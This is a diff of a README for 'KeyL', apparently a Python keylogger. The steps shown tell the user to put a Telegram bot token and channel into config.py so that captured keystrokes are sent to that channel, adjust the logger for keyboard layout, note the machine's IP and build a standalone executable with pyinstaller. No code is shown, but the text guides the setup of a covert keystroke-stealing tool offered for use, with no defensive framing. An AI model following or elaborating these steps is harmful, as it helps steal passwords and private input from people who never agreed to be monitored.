fortigate3600/KeyL/README.md

    `cd KeyL`

-3. **Set Your Telegram Token**
+2. **Set Your Telegram Token**
    Go on telegram, get a bot and put its token in `config.py` \
    Then create a channel called "@channelName" and put it `config.py` as well \
    after that add your mod to the channel as an admin
    > If you’re unsure how to do it, it's trivial stuff just ask ChatGPT.

-5. **Customize Logger Behavior (Optional)**
+3. **Customize Logger Behavior (Optional)**
    If you're geek enough you can configure the logger by modifying flags inside `KeyL.py`. \
-   Be aware that I configure the software with an italian layout and every keyboard is slighly different (even with the same layout), so could be that there some typo.
+   Be aware that I configure the software with an italian layout \
+   Other than that, every keyboard is slightly different (even with the same layout), so there might be some typos.

-7. execute `ifconfig` to get yout ip, it is gonna be usefull later
+4. execute `ifconfig` to get yout ip, it is gonna be usefull later

-8. `pyinstaller --onefile --name mykeyl KeyL.py`
+5. `pyinstaller --onefile --name mykeyl KeyL.py`
    > if you don't have it `pip3 install pyinstaller` \
     try again `pyinstaller --onefile --name mykeyl KeyL.py`